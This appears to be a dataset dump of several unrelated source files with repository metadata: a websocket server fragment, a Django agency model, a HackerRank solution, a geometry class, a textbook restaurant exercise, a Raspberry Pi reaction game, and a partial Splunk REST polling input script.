for client in key_dict['address'].values():
client.sendMessage('ok'.encode('utf8'), False)
"""
if reply.channel == 'google':
tags['google'].append(reply.value)
# if reply.channel == 'instagram':
# tags['instagram'].append(reply.value)
# if reply.channel == 'yandex':
# tags['yandex'].append(reply.value)
for tag, clients in factory.get_tags().items():
if tag in tags['google']:
# and tag in tags['instagram']:
# and tag in tags['yandex']:
for client in clients:
for address in client:
client[address].sendMessage('ok'.encode('utf8'), False)
tags['google'].remove(tag)
# tags['instagram'].remove(tag)
# tags['yandex'].remove(tag)
"""
"""
spiders.append(json.loads(reply.value))
if spiders:
# if clients is not None:
for spider in spiders:
tags = factory.get_client(spider['tag'])
if 'google' in spider['site'] \
and 'instagram' in spider['site']:
# and 'yandex' in spider['site']:
# print(spiders[0]['tag'])
# for tag in spider['tag']:
# print('tag')
# print(tag)
for clients in tags:
for client in clients:
clients[client].sendMessage('ok'.encode('utf8'), False)
# spiders.clear()
"""
"""
try:
if 'google' in spiders:
# and 'yandex' in spiders \
# and 'instagram' in spiders:
factory.get_client(clients).sendMessage(
'ok'.encode('utf8'), False)
spiders.clear()
# elif 'google' in spiders:
# factory.get_client(client_id).sendMessage(
# 'google'.encode('utf8'), False)
# elif 'yandex' in spiders:
# factory.get_client(client_id).sendMessage(
# 'yandex'.encode('utf8'), False)
# elif 'instagram' in spiders:
# factory.get_client(client_id).sendMessage(
# 'instagram'.encode('utf8'), False)
except:
factory.get_client(clients).sendMessage(
'error'.encode('utf8'), False)
"""
logging.info('Received: ' + repr(reply.value) + ' on channel ' +
reply.channel)
# When finished, close the connection.
connection.close()
if __name__ == '__main__':
try:
import asyncio
except ImportError:
import trollius as asyncio
factory = WebSocketFactory(u"ws://127.0.0.1:9000")
factory.protocol = ServerProtocol
loop = asyncio.get_event_loop()
coro = loop.create_server(factory, '0.0.0.0', 9000)
web_socket_server = loop.run_until_complete(coro)
subscriber_server = loop.run_until_complete(run_subscriber())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
web_socket_server.close()
subscriber_server.close()
loop.close()
| [
"natasga.kuskova@gmail.com"
] | natasga.kuskova@gmail.com |
d7ce23f53fe0a65a72e04d05fb3d4fc24bc04900 | 973e19eb630d38dc1c9aaf5662199257afc38786 | /usaspending_api/references/models/toptier_agency.py | bb9f3109a7f02e7fea17ec1cfeb604dfe382929c | [
"CC0-1.0"
] | permissive | Violet26/usaspending-api | 40e424c333c59289a2d76db4274e1637f2fcea7c | 3e2b54662bb27217f4af223d429b09c112a01a5a | refs/heads/dev | 2022-12-15T22:04:36.837754 | 2020-02-14T18:20:21 | 2020-02-14T18:20:21 | 241,180,147 | 0 | 0 | CC0-1.0 | 2022-12-08T06:22:57 | 2020-02-17T18:35:00 | null | UTF-8 | Python | false | false | 682 | py | from django.db import models
class ToptierAgency(models.Model):
toptier_agency_id = models.AutoField(primary_key=True)
create_date = models.DateTimeField(auto_now_add=True)
update_date = models.DateTimeField(auto_now=True)
toptier_code = models.TextField(db_index=True, unique=True)
abbreviation = models.TextField(blank=True, null=True)
name = models.TextField(db_index=True)
mission = models.TextField(blank=True, null=True)
website = models.URLField(blank=True, null=True)
justification = models.URLField(blank=True, null=True)
icon_filename = models.TextField(blank=True, null=True)
class Meta:
db_table = "toptier_agency"
| [
"barden_kirk@bah.com"
] | barden_kirk@bah.com |
92e7d30756b64afbf77cb481a3bf486bdcc1f546 | c02f0785a36f970e72239acb73a8ed14e580d2c9 | /interview/interview_preparation_kit/warmup/challenges/sock_merchant/sock_merchant.py | df985956bfa5a017e5801d5c4107f8a8a06efe26 | [] | no_license | Nyakama/hacker_rank | f6fca0fea20a583e6c0e4b11d3e46c0c11c7e051 | fe611c1f9bde7233d5c1e4d9b3e58594193434ea | refs/heads/master | 2022-12-13T09:17:24.093312 | 2020-08-29T00:03:57 | 2020-08-29T00:03:57 | 290,355,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
sum=0
for val in Counter(ar).values():
sum+=val//2
return sum
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
ar = list(map(int, input().rstrip().split()))
result = sockMerchant(n, ar)
fptr.write(str(result) + '\n')
fptr.close()
| [
"lungile.nyakama@gmail.com"
] | lungile.nyakama@gmail.com |
24eb3295d972efef909d1fed9ece99c0780b2a84 | 83bd3d644c8feb0b57ac44b681fee4650677c186 | /Commonstruct/TriangleSlice.py | c9fe4b5b4c43f7755f393bffcfb60bd5863f3c0d | [] | no_license | theForgerass/3DPointCloud | 389d2af938c1cdb0650811db0485afacfefd2c76 | e42fe100a82b87264ab26aebdd4168492ae79b93 | refs/heads/master | 2020-06-04T04:09:06.555579 | 2019-06-05T10:32:51 | 2019-06-12T10:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | """
三角面片结构
"""
from Commonstruct import Point3D
from Commonstruct import Triangle
class TriangleSlice:
__slots__ = ('_facet', '_vertex')
def __init__(self, facet=Point3D(), vertex=Triangle()):
"""
三角面片初始化函数
:param facet: 法向量
:param vertex: 顶点(3个)
"""
self._facet = facet
self._vertex = vertex
@property
def facet(self):
return self._facet
@facet.setter
def facet(self, facet):
self._facet = facet
@property
def vertex(self):
return self._vertex
@vertex.setter
def vertex(self, vertex):
self._vertex = vertex
| [
"614490648@qq.com"
] | 614490648@qq.com |
050fbf37649611034d2d17fa1d8f6eaaec527045 | 99b784550a6d306147c022c8d829800b0fbb8c68 | /Part_1_Basics/Chapter_9_Classes/number_served.py | c4bf3cff3db3a73bcf0555f68427754403f58a40 | [] | no_license | apuya/python_crash_course | 116d6598f656d8fed0b4184edbce8e996cd0f564 | 0b2e8a6e9849a198cfb251706500a919d6f51fe7 | refs/heads/main | 2023-06-03T22:41:03.203889 | 2021-06-16T04:07:28 | 2021-06-16T04:07:28 | 367,812,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,282 | py | # Python Crash Course: A Hands-On, Project-Based Introduction To Programming
#
# Name: Mark Lester Apuya
# Date: 06/12/2021
#
# Chapter 9: Classes
#
# Exercise 9.4 Number Served:
# Start with your program from Exercise 9-1 (page 162). Add an attribute
# called number_served with a default value of 0. Create an instance called
# restaurant from this class. Print the number of customers the restaurant has
# served, and then change this value and print it again.
# Add a method called set_number_served() that lets you set the number of
# customers that have been served. Call this method with a new number and print
# the value again.
# Add a method called increment_number_served() that lets you increment the
# number of customers who’ve been served. Call this method with any number you
# like that could represent how many customers were served in, say, a day of
# business.
class Restaurant:
"""
Restaurant information.
"""
def __init__(self, restaurant_name, cuisine_type):
"""
Initialize restuarant name and cuisine type
"""
self.restaurant_name = restaurant_name
self.cuisine_type = cuisine_type
self.number_served = 0
def discribe_restaurant(self):
"""
Prints restaurant information.
"""
print(f"\n{self.restaurant_name} serves {self.cuisine_type}")
def open_restaurant(self):
"""
Prints that the restaurant is open.
"""
print(f"\n{self.restaurant_name} is open.")
def set_number_served(self, number_served):
"""
Set the number of customers served.
"""
self.number_served = number_served
def increment_number_served(self, number_served):
"""
Increment the number of customers who have been served.
"""
self.number_served += number_served
restaurant = Restaurant('Olive Garden', 'Italian')
restaurant.discribe_restaurant()
print(f"\nNumber served: {restaurant.number_served}")
restaurant.number_served = 22
print(f"\nNumber served: {restaurant.number_served}")
restaurant.set_number_served(20)
print(f"\nNumber served: {restaurant.number_served}")
restaurant.increment_number_served(2)
print(f"\nNumber served: {restaurant.number_served}") | [
"contact@mapuya.com"
] | contact@mapuya.com |
a5b7854d74583f2b5913bc129ba9fe75b8003d23 | fe2aa0c918f2dd7950414757fe0d1b73c3cb75a4 | /votesystem/vote/migrations/0002_remove_poll_name.py | d7773cc24a907bb7edcf12ab3b09786ba5fdf6c2 | [
"MIT"
] | permissive | majaeseong/votesystem | 6b705f7a2aedce692607de315e5652c44ecd0ce2 | 624fadca0251a81c0417f3a3a23f3d6c38b1cf33 | refs/heads/master | 2020-04-14T06:15:58.589054 | 2019-01-07T05:31:55 | 2019-01-07T05:31:55 | 163,681,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | # Generated by Django 2.0.9 on 2018-12-30 11:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('vote', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='poll',
name='name',
),
]
| [
"cpontina@naver.com"
] | cpontina@naver.com |
9ae2cd4efdde3a7a2959e488d8dc87e026f832c1 | f1d2d069d905572bec0d740a476e70f7a9ea3a1f | /src/main/python/game.py | 252d821510edc3db2e1dc4a7a70a46ed66cda5be | [] | no_license | shahchiragr/IoT | 312d75f74dbae4cf82bf7af35fb7dd0ae803efba | 282613e0cf8d8eda79dcac7907802a8b6b083b6b | refs/heads/master | 2021-01-20T19:13:15.704424 | 2016-07-27T05:27:34 | 2016-07-27T05:27:34 | 64,192,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | #import necessary libraries
import RPi.GPIO as gp,random, time
#set variable for easy pin reference
switchR = 19 #red switch
switchB = 26 #blue switch
ledR = 13
ledG = 6
ledB = 5
#initialize GPIO pins
gp.setmode(gp.BCM)
gp.setup(switchR, gp.IN, pull_up_down=gp.PUD_DOWN)
gp.setup(switchB, gp.IN, pull_up_down=gp.PUD_DOWN)
gp.setup([ledR,ledG,ledB],gp.OUT)
#define a function to monitor switches
def monitorSwitches(seconds):
#loop for specified time; checking for switch press
timeEnd = time.time() + seconds
while time.time() < timeEnd:
if gp.input(switchR) == True:
return announceWinner(switchR)
if gp.input(switchB) == True:
return announceWinner(switchB)
return False
# define a function to announce the Winner
def announceWinner(switch):
#define witch button was press first
firstBtn = ledR if switch == switchR else ledB
lastBtn = ledB if switch == switchR else ledR
#determin witch player won
winner = firstBtn if ledColor == ledG else lastBtn
#turn off active color and falsh winnin color
gp.output(ledColor, False)
for i in range(0,10):
gp.output(winner,True)
time.sleep(0.5)
gp.output(winner,False)
time.sleep(0.5)
#play the game, loop until a switch pressed
winner = False
while winner == False:
#select random Led color
ledColor = random.choice([ledR,ledG,ledB])
#play through one color style
gp.output(ledColor, True) # turn on LED
winner = monitorSwitches(5) #monitor switches
gp.output(ledColor, False) # turn off LED
gp.cleanup()
| [
"chirag_r_shah@hotmail.com"
] | chirag_r_shah@hotmail.com |
0b507bfacaa250eea6dafb6b5078efa843c7bb81 | 99356336a59b6c63de99156d2147fe3e4c1d13ac | /implementations/rest/bin/rest.py | d2f7d390dbbcb6b5d8db6386eca027e72521c0d2 | [
"Apache-2.0"
] | permissive | splunkdevabhi/SplunkModularInputsPythonFramework | 1ee157fe59feced526db1a278794406c0242acf2 | 04b69c29d95ef4c125bc9766e71d26620e1369db | refs/heads/master | 2020-12-26T01:13:42.298552 | 2015-10-14T17:05:38 | 2015-10-14T17:05:38 | 48,684,067 | 3 | 1 | null | 2015-12-28T09:07:31 | 2015-12-28T09:07:30 | null | UTF-8 | Python | false | false | 32,429 | py | '''
Modular Input Script
Copyright (C) 2012 Splunk, Inc.
All Rights Reserved
'''
import sys,logging,os,time,re,threading
import xml.dom.minidom
import tokens
from datetime import datetime
SPLUNK_HOME = os.environ.get("SPLUNK_HOME")
RESPONSE_HANDLER_INSTANCE = None
SPLUNK_PORT = 8089
STANZA = None
SESSION_TOKEN = None
REGEX_PATTERN = None
#dynamically load in any eggs in /etc/apps/snmp_ta/bin
EGG_DIR = SPLUNK_HOME + "/etc/apps/rest_ta/bin/"
for filename in os.listdir(EGG_DIR):
if filename.endswith(".egg"):
sys.path.append(EGG_DIR + filename)
import requests,json
from requests.auth import HTTPBasicAuth
from requests.auth import HTTPDigestAuth
from requests_oauthlib import OAuth1
from requests_oauthlib import OAuth2Session
from oauthlib.oauth2 import WebApplicationClient
from requests.auth import AuthBase
from splunklib.client import connect
from splunklib.client import Service
from croniter import croniter
#set up logging
logging.root
logging.root.setLevel(logging.ERROR)
formatter = logging.Formatter('%(levelname)s %(message)s')
#with zero args , should go to STD ERR
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logging.root.addHandler(handler)
SCHEME = """<scheme>
<title>REST</title>
<description>REST API input for polling data from RESTful endpoints</description>
<use_external_validation>true</use_external_validation>
<streaming_mode>xml</streaming_mode>
<use_single_instance>false</use_single_instance>
<endpoint>
<args>
<arg name="name">
<title>REST input name</title>
<description>Name of this REST input</description>
</arg>
<arg name="endpoint">
<title>Endpoint URL</title>
<description>URL to send the HTTP GET request to</description>
<required_on_edit>false</required_on_edit>
<required_on_create>true</required_on_create>
</arg>
<arg name="http_method">
<title>HTTP Method</title>
<description>HTTP method to use.Defaults to GET. POST and PUT are not really RESTful for requesting data from the API, but useful to have the option for target APIs that are "REST like"</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="request_payload">
<title>Request Payload</title>
<description>Request payload for POST and PUT HTTP Methods</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="auth_type">
<title>Authentication Type</title>
<description>Authentication method to use : none | basic | digest | oauth1 | oauth2 | custom</description>
<required_on_edit>false</required_on_edit>
<required_on_create>true</required_on_create>
</arg>
<arg name="auth_user">
<title>Authentication User</title>
<description>Authentication user for BASIC or DIGEST auth</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="auth_password">
<title>Authentication Password</title>
<description>Authentication password for BASIC or DIGEST auth</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_client_key">
<title>OAUTH 1 Client Key</title>
<description>OAUTH 1 client key</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_client_secret">
<title>OAUTH 1 Client Secret</title>
<description>OAUTH 1 client secret</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_access_token">
<title>OAUTH 1 Access Token</title>
<description>OAUTH 1 access token</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_access_token_secret">
<title>OAUTH 1 Access Token Secret</title>
<description>OAUTH 1 access token secret</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_token_type">
<title>OAUTH 2 Token Type</title>
<description>OAUTH 2 token type</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_access_token">
<title>OAUTH 2 Access Token</title>
<description>OAUTH 2 access token</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_refresh_token">
<title>OAUTH 2 Refresh Token</title>
<description>OAUTH 2 refresh token</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_refresh_url">
<title>OAUTH 2 Token Refresh URL</title>
<description>OAUTH 2 token refresh URL</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_refresh_props">
<title>OAUTH 2 Token Refresh Propertys</title>
<description>OAUTH 2 token refresh propertys : key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_client_id">
<title>OAUTH 2 Client ID</title>
<description>OAUTH 2 client ID</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_client_secret">
<title>OAUTH 2 Client Secret</title>
<description>OAUTH 2 client secret</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="http_header_propertys">
<title>HTTP Header Propertys</title>
<description>Custom HTTP header propertys : key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="url_args">
<title>URL Arguments</title>
<description>Custom URL arguments : key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_type">
<title>Response Type</title>
<description>Rest Data Response Type : json | xml | text</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="streaming_request">
<title>Streaming Request</title>
<description>Whether or not this is a HTTP streaming request : true | false</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="http_proxy">
<title>HTTP Proxy Address</title>
<description>HTTP Proxy Address</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="https_proxy">
<title>HTTPs Proxy Address</title>
<description>HTTPs Proxy Address</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="request_timeout">
<title>Request Timeout</title>
<description>Request Timeout in seconds</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="backoff_time">
<title>Backoff Time</title>
<description>Time in seconds to wait for retry after error or timeout</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="polling_interval">
<title>Polling Interval</title>
<description>Interval time in seconds to poll the endpoint</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="sequential_mode">
<title>Sequential Mode</title>
<description>Whether multiple requests spawned by tokenization are run in parallel or sequentially</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="sequential_stagger_time">
<title>Sequential Stagger Time</title>
<description>An optional stagger time period between sequential requests</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="delimiter">
<title>Delimiter</title>
<description>Delimiter to use for any multi "key=value" field inputs</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="index_error_response_codes">
<title>Index Error Responses</title>
<description>Whether or not to index error response codes : true | false</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_handler">
<title>Response Handler</title>
<description>Python classname of custom response handler</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_handler_args">
<title>Response Handler Arguments</title>
<description>Response Handler arguments string , key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_filter_pattern">
<title>Response Filter Pattern</title>
<description>Python Regex pattern, if present , responses must match this pattern to be indexed</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="custom_auth_handler">
<title>Custom_Auth Handler</title>
<description>Python classname of custom auth handler</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="custom_auth_handler_args">
<title>Custom_Auth Handler Arguments</title>
<description>Custom Authentication Handler arguments string , key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="cookies">
<title>Cookies</title>
<description>Persist cookies in format key=value,key2=value2,...</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
</args>
</endpoint>
</scheme>
"""
def get_current_datetime_for_cron():
current_dt = datetime.now()
#dont need seconds/micros for cron
current_dt = current_dt.replace(second=0, microsecond=0)
return current_dt
def do_validate():
config = get_validation_config()
#TODO
#if error , print_validation_error & sys.exit(2)
def do_run(config,endpoint_list):
#setup some globals
server_uri = config.get("server_uri")
global SPLUNK_PORT
global STANZA
global SESSION_TOKEN
global delimiter
SPLUNK_PORT = server_uri[18:]
STANZA = config.get("name")
SESSION_TOKEN = config.get("session_key")
#params
http_method=config.get("http_method","GET")
request_payload=config.get("request_payload")
#none | basic | digest | oauth1 | oauth2
auth_type=config.get("auth_type","none")
#Delimiter to use for any multi "key=value" field inputs
delimiter=config.get("delimiter",",")
#for basic and digest
auth_user=config.get("auth_user")
auth_password=config.get("auth_password")
#for oauth1
oauth1_client_key=config.get("oauth1_client_key")
oauth1_client_secret=config.get("oauth1_client_secret")
oauth1_access_token=config.get("oauth1_access_token")
oauth1_access_token_secret=config.get("oauth1_access_token_secret")
#for oauth2
oauth2_token_type=config.get("oauth2_token_type","Bearer")
oauth2_access_token=config.get("oauth2_access_token")
oauth2_refresh_token=config.get("oauth2_refresh_token")
oauth2_refresh_url=config.get("oauth2_refresh_url")
oauth2_refresh_props_str=config.get("oauth2_refresh_props")
oauth2_client_id=config.get("oauth2_client_id")
oauth2_client_secret=config.get("oauth2_client_secret")
oauth2_refresh_props={}
if not oauth2_refresh_props_str is None:
oauth2_refresh_props = dict((k.strip(), v.strip()) for k,v in
(item.split('=',1) for item in oauth2_refresh_props_str.split(delimiter)))
oauth2_refresh_props['client_id'] = oauth2_client_id
oauth2_refresh_props['client_secret'] = oauth2_client_secret
http_header_propertys={}
http_header_propertys_str=config.get("http_header_propertys")
if not http_header_propertys_str is None:
http_header_propertys = dict((k.strip(), v.strip()) for k,v in
(item.split('=',1) for item in http_header_propertys_str.split(delimiter)))
url_args={}
url_args_str=config.get("url_args")
if not url_args_str is None:
url_args = dict((k.strip(), v.strip()) for k,v in
(item.split('=',1) for item in url_args_str.split(delimiter)))
#json | xml | text
response_type=config.get("response_type","text")
streaming_request=int(config.get("streaming_request",0))
http_proxy=config.get("http_proxy")
https_proxy=config.get("https_proxy")
proxies={}
if not http_proxy is None:
proxies["http"] = http_proxy
if not https_proxy is None:
proxies["https"] = https_proxy
cookies={}
cookies_str=config.get("cookies")
if not cookies_str is None:
cookies = dict((k.strip(), v.strip()) for k,v in
(item.split('=',1) for item in cookies_str.split(delimiter)))
request_timeout=int(config.get("request_timeout",30))
backoff_time=int(config.get("backoff_time",10))
sequential_stagger_time = int(config.get("sequential_stagger_time",0))
polling_interval_string = config.get("polling_interval","60")
if polling_interval_string.isdigit():
polling_type = 'interval'
polling_interval=int(polling_interval_string)
else:
polling_type = 'cron'
cron_start_date = datetime.now()
cron_iter = croniter(polling_interval_string, cron_start_date)
index_error_response_codes=int(config.get("index_error_response_codes",0))
response_filter_pattern=config.get("response_filter_pattern")
if response_filter_pattern:
global REGEX_PATTERN
REGEX_PATTERN = re.compile(response_filter_pattern)
response_handler_args={}
response_handler_args_str=config.get("response_handler_args")
if not response_handler_args_str is None:
response_handler_args = dict((k.strip(), v.strip()) for k,v in
(item.split('=',1) for item in response_handler_args_str.split(delimiter)))
response_handler=config.get("response_handler","DefaultResponseHandler")
module = __import__("responsehandlers")
class_ = getattr(module,response_handler)
global RESPONSE_HANDLER_INSTANCE
RESPONSE_HANDLER_INSTANCE = class_(**response_handler_args)
custom_auth_handler=config.get("custom_auth_handler")
if custom_auth_handler:
module = __import__("authhandlers")
class_ = getattr(module,custom_auth_handler)
custom_auth_handler_args={}
custom_auth_handler_args_str=config.get("custom_auth_handler_args")
if not custom_auth_handler_args_str is None:
custom_auth_handler_args = dict((k.strip(), v.strip()) for k,v in (item.split('=',1) for item in custom_auth_handler_args_str.split(delimiter)))
CUSTOM_AUTH_HANDLER_INSTANCE = class_(**custom_auth_handler_args)
try:
auth=None
oauth2=None
if auth_type == "basic":
auth = HTTPBasicAuth(auth_user, auth_password)
elif auth_type == "digest":
auth = HTTPDigestAuth(auth_user, auth_password)
elif auth_type == "oauth1":
auth = OAuth1(oauth1_client_key, oauth1_client_secret,
oauth1_access_token ,oauth1_access_token_secret)
elif auth_type == "oauth2":
token={}
token["token_type"] = oauth2_token_type
token["access_token"] = oauth2_access_token
token["refresh_token"] = oauth2_refresh_token
token["expires_in"] = "5"
client = WebApplicationClient(oauth2_client_id)
oauth2 = OAuth2Session(client, token=token,auto_refresh_url=oauth2_refresh_url,auto_refresh_kwargs=oauth2_refresh_props,token_updater=oauth2_token_updater)
elif auth_type == "custom" and CUSTOM_AUTH_HANDLER_INSTANCE:
auth = CUSTOM_AUTH_HANDLER_INSTANCE
req_args = {"verify" : False ,"stream" : bool(streaming_request) , "timeout" : float(request_timeout)}
if auth:
req_args["auth"]= auth
if url_args:
req_args["params"]= url_args
if cookies:
req_args["cookies"]= cookies
if http_header_propertys:
req_args["headers"]= http_header_propertys
if proxies:
req_args["proxies"]= proxies
if request_payload and not http_method == "GET":
req_args["data"]= request_payload
while True:
if polling_type == 'cron':
next_cron_firing = cron_iter.get_next(datetime)
while get_current_datetime_for_cron() != next_cron_firing:
time.sleep(float(10))
for endpoint in endpoint_list:
if "params" in req_args:
req_args_params_current = dictParameterToStringFormat(req_args["params"])
else:
req_args_params_current = ""
if "cookies" in req_args:
req_args_cookies_current = dictParameterToStringFormat(req_args["cookies"])
else:
req_args_cookies_current = ""
if "headers" in req_args:
req_args_headers_current = dictParameterToStringFormat(req_args["headers"])
else:
req_args_headers_current = ""
if "data" in req_args:
req_args_data_current = req_args["data"]
else:
req_args_data_current = ""
try:
if oauth2:
if http_method == "GET":
r = oauth2.get(endpoint,**req_args)
elif http_method == "POST":
r = oauth2.post(endpoint,**req_args)
elif http_method == "PUT":
r = oauth2.put(endpoint,**req_args)
else:
if http_method == "GET":
r = requests.get(endpoint,**req_args)
elif http_method == "POST":
r = requests.post(endpoint,**req_args)
elif http_method == "PUT":
r = requests.put(endpoint,**req_args)
except requests.exceptions.Timeout,e:
logging.error("HTTP Request Timeout error: %s" % str(e))
time.sleep(float(backoff_time))
continue
except Exception as e:
logging.error("Exception performing request: %s" % str(e))
time.sleep(float(backoff_time))
continue
try:
r.raise_for_status()
if streaming_request:
for line in r.iter_lines():
if line:
handle_output(r,line,response_type,req_args,endpoint)
else:
handle_output(r,r.text,response_type,req_args,endpoint)
except requests.exceptions.HTTPError,e:
error_output = r.text
error_http_code = r.status_code
if index_error_response_codes:
error_event=""
error_event += 'http_error_code = %s error_message = %s' % (error_http_code, error_output)
print_xml_single_instance_mode(error_event)
sys.stdout.flush()
logging.error("HTTP Request error: %s" % str(e))
time.sleep(float(backoff_time))
continue
if "data" in req_args:
checkParamUpdated(req_args_data_current,req_args["data"],"request_payload")
if "params" in req_args:
checkParamUpdated(req_args_params_current,dictParameterToStringFormat(req_args["params"]),"url_args")
if "headers" in req_args:
checkParamUpdated(req_args_headers_current,dictParameterToStringFormat(req_args["headers"]),"http_header_propertys")
if "cookies" in req_args:
checkParamUpdated(req_args_cookies_current,dictParameterToStringFormat(req_args["cookies"]),"cookies")
if sequential_stagger_time > 0:
time.sleep(float(sequential_stagger_time))
if polling_type == 'interval':
time.sleep(float(polling_interval))
except RuntimeError,e:
logging.error("Looks like an error: %s" % str(e))
sys.exit(2)
def replaceTokens(raw_string):
try:
url_list = [raw_string]
substitution_tokens = re.findall("\$(?:\w+)\$",raw_string)
for token in substitution_tokens:
token_response = getattr(tokens,token[1:-1])()
if(isinstance(token_response,list)):
temp_list = []
for token_response_value in token_response:
for url in url_list:
temp_list.append(url.replace(token,token_response_value))
url_list = temp_list
else:
for index,url in enumerate(url_list):
url_list[index] = url.replace(token,token_response)
return url_list
except:
e = sys.exc_info()[1]
logging.error("Looks like an error substituting tokens: %s" % str(e))
def checkParamUpdated(cached,current,rest_name):
if not (cached == current):
try:
args = {'host':'localhost','port':SPLUNK_PORT,'token':SESSION_TOKEN}
service = Service(**args)
item = service.inputs.__getitem__(STANZA[7:])
item.update(**{rest_name:current})
except RuntimeError,e:
logging.error("Looks like an error updating the modular input parameter %s: %s" % (rest_name,str(e),))
def dictParameterToStringFormat(parameter):
if parameter:
return ''.join(('{}={}'+delimiter).format(key, val) for key, val in parameter.items())[:-1]
else:
return None
def oauth2_token_updater(token):
try:
args = {'host':'localhost','port':SPLUNK_PORT,'token':SESSION_TOKEN}
service = Service(**args)
item = service.inputs.__getitem__(STANZA[7:])
item.update(oauth2_access_token=token["access_token"],oauth2_refresh_token=token["refresh_token"])
except RuntimeError,e:
logging.error("Looks like an error updating the oauth2 token: %s" % str(e))
def handle_output(response,output,type,req_args,endpoint):
try:
if REGEX_PATTERN:
search_result = REGEX_PATTERN.search(output)
if search_result == None:
return
RESPONSE_HANDLER_INSTANCE(response,output,type,req_args,endpoint)
sys.stdout.flush()
except RuntimeError,e:
logging.error("Looks like an error handle the response output: %s" % str(e))
# prints validation error data to be consumed by Splunk
def print_validation_error(s):
print "<error><message>%s</message></error>" % encodeXMLText(s)
# prints XML stream
def print_xml_single_instance_mode(s):
print "<stream><event><data>%s</data></event></stream>" % encodeXMLText(s)
# prints simple stream
def print_simple(s):
print "%s\n" % s
def encodeXMLText(text):
text = text.replace("&", "&")
text = text.replace("\"", """)
text = text.replace("'", "'")
text = text.replace("<", "<")
text = text.replace(">", ">")
return text
def usage():
print "usage: %s [--scheme|--validate-arguments]"
logging.error("Incorrect Program Usage")
sys.exit(2)
def do_scheme():
print SCHEME
#read XML configuration passed from splunkd, need to refactor to support single instance mode
def get_input_config():
config = {}
try:
# read everything from stdin
config_str = sys.stdin.read()
# parse the config XML
doc = xml.dom.minidom.parseString(config_str)
root = doc.documentElement
session_key_node = root.getElementsByTagName("session_key")[0]
if session_key_node and session_key_node.firstChild and session_key_node.firstChild.nodeType == session_key_node.firstChild.TEXT_NODE:
data = session_key_node.firstChild.data
config["session_key"] = data
server_uri_node = root.getElementsByTagName("server_uri")[0]
if server_uri_node and server_uri_node.firstChild and server_uri_node.firstChild.nodeType == server_uri_node.firstChild.TEXT_NODE:
data = server_uri_node.firstChild.data
config["server_uri"] = data
conf_node = root.getElementsByTagName("configuration")[0]
if conf_node:
logging.debug("XML: found configuration")
stanza = conf_node.getElementsByTagName("stanza")[0]
if stanza:
stanza_name = stanza.getAttribute("name")
if stanza_name:
logging.debug("XML: found stanza " + stanza_name)
config["name"] = stanza_name
params = stanza.getElementsByTagName("param")
for param in params:
param_name = param.getAttribute("name")
logging.debug("XML: found param '%s'" % param_name)
if param_name and param.firstChild and \
